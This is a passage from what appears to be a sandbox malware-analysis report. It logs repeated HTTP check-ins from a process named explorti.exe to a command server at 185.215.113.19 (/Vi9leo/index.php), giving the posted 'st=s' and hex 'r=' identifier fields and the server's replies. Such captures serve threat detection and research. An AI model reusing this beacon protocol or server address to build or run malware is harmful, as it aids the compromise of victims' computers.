                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:12.538479090 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:12.790344000 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.449744185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:12.912672043 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:13.665246010 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:13.666126013 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:13.915050983 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.449745185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:14.034913063 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:14.781486034 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:14.782449961 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:15.029051065 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.449746185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:15.144942999 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:15.926115036 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:15.927194118 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:16.907579899 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.449747185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:17.019382954 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:17.773473978 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:17.774467945 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:18.023941994 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.449748185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:18.149038076 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:18.919363022 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:18.921818972 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:19.171632051 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.449749185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:19.284646034 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:20.028937101 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:20.032079935 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:20.315298080 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.449750185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:20.431212902 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:21.179347038 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:21.180248976 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:21.438505888 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.449751185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:21.551347971 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:22.318650007 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:22.323117971 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:22.575063944 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.449752185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:22.709281921 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:23.451471090 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:23.453860044 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:23.703874111 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.449753185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:23.816864014 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:24.573972940 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:24.575294018 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:24.824321985 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.449754185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:24.942487955 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:25.709261894 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:25.758819103 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:26.009922981 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.449755185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:26.128757000 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:26.882713079 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:26.883811951 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
